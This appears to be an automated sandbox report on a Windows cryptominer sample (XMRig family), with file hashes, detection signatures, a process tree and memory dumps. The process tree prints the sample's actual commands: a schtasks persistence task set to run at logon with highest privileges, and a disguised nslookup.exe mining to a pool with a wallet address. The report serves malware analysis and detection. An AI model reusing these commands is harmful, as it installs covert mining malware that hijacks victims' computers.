Analysis

  • max time kernel
    146s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20-11-2024 13:05

General

  • Target

    ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b.exe

  • Size

    2.1MB

  • MD5

    ef9e6a4bab77a1e5ed51669eabeba31d

  • SHA1

    43b67b32d2fd462f0cb9277ed974d63a5575fc8c

  • SHA256

    ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b

  • SHA512

    8d3605e486f0ccb01d3022d54c57e8c65622272f5b477035469e45d3289973407f0584142b261a3faca797e03412d182c376c2a2ba6970181e059982223afe99

  • SSDEEP

    24576:XRVlL9DqdKIEs0D7Vx1YPgZqkwBKmXXJj52antf0RsLrGaaFssusSWcaurrYL0Yv:h/GJ66PgUKUZkgtzGGsrzcdorJKJS

Score
10/10

Malware Config

Signatures

  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 17 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b.exe
    "C:\Users\Admin\AppData\Local\Temp\ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2892
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2064
      • C:\Windows\System32\cmd.exe
        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\Admin\IOAshdohSha.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2996
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\Admin\IOAshdohSha.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2832
      • C:\Windows\System32\cmd.exe
        "cmd" cmd /c "C:\Users\Admin\IOAshdohSha.exe"
        3⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2112
        • C:\Users\Admin\IOAshdohSha.exe
          C:\Users\Admin\IOAshdohSha.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2588
          • C:\Windows\System32\conhost.exe
            "C:\Windows\System32\conhost.exe" "C:\Users\Admin\IOAshdohSha.exe"
            5⤵
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2208
            • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
              "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:1968
              • C:\Windows\System32\conhost.exe
                "C:\Windows\System32\conhost.exe" "/sihost64"
                7⤵
                  PID:1208
              • C:\Windows\System32\nslookup.exe
                C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1264

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • \Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

      Filesize

      31KB

      MD5

      6a7e9885a2d01df564b46f8f27258853

      SHA1

      2f57231a188226669ff74cf886a09572ed69025e

      SHA256

      6ba3e42c8fa7dabe994e2793f369bac914ea2e4949174fc2a0efe4cbfebe8171

      SHA512

      84b4b84066a48df6bd087679a75333c306c8f688679c508e171b14d5012711de3a781cea4d4c65debb694557dafd66dbc359516451f700179d5c6806710cdf17

    • \Users\Admin\IOAshdohSha.exe

      Filesize

      2.1MB

      MD5

      ef9e6a4bab77a1e5ed51669eabeba31d

      SHA1

      43b67b32d2fd462f0cb9277ed974d63a5575fc8c

      SHA256

      ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b

      SHA512

      8d3605e486f0ccb01d3022d54c57e8c65622272f5b477035469e45d3289973407f0584142b261a3faca797e03412d182c376c2a2ba6970181e059982223afe99

    • memory/1208-66-0x0000000000430000-0x0000000000436000-memory.dmp

      Filesize

      24KB

    • memory/1208-65-0x0000000000060000-0x0000000000066000-memory.dmp

      Filesize

      24KB

    • memory/1264-44-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1264-37-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1264-67-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1264-46-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1264-57-0x00000000000E0000-0x0000000000100000-memory.dmp

      Filesize

      128KB

    • memory/1264-61-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1264-62-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1264-64-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1264-63-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1264-42-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1264-48-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1264-50-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1264-30-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1264-32-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1264-34-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1264-38-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1264-40-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1264-54-0x000007FFFFFD6000-0x000007FFFFFD7000-memory.dmp

      Filesize

      4KB

    • memory/1264-55-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1264-60-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1264-56-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1264-52-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2064-1-0x000007FEF59E3000-0x000007FEF59E4000-memory.dmp

      Filesize

      4KB

    • memory/2064-6-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp

      Filesize

      9.9MB

    • memory/2064-3-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp

      Filesize

      9.9MB

    • memory/2064-5-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp

      Filesize

      9.9MB

    • memory/2064-0-0x0000000000120000-0x0000000000340000-memory.dmp

      Filesize

      2.1MB

    • memory/2064-7-0x000007FEF59E3000-0x000007FEF59E4000-memory.dmp

      Filesize

      4KB

    • memory/2064-8-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp

      Filesize

      9.9MB

    • memory/2064-4-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp

      Filesize

      9.9MB

    • memory/2064-14-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp

      Filesize

      9.9MB

    • memory/2064-2-0x000000001B440000-0x000000001B660000-memory.dmp

      Filesize

      2.1MB

    • memory/2208-18-0x000007FEF4FF0000-0x000007FEF59DC000-memory.dmp

      Filesize

      9.9MB

    • memory/2208-17-0x000007FEF4FF3000-0x000007FEF4FF4000-memory.dmp

      Filesize

      4KB

    • memory/2208-20-0x000007FEF4FF0000-0x000007FEF59DC000-memory.dmp

      Filesize

      9.9MB

    • memory/2208-19-0x000007FEF4FF0000-0x000007FEF59DC000-memory.dmp

      Filesize

      9.9MB

    • memory/2208-59-0x000007FEF4FF0000-0x000007FEF59DC000-memory.dmp

      Filesize

      9.9MB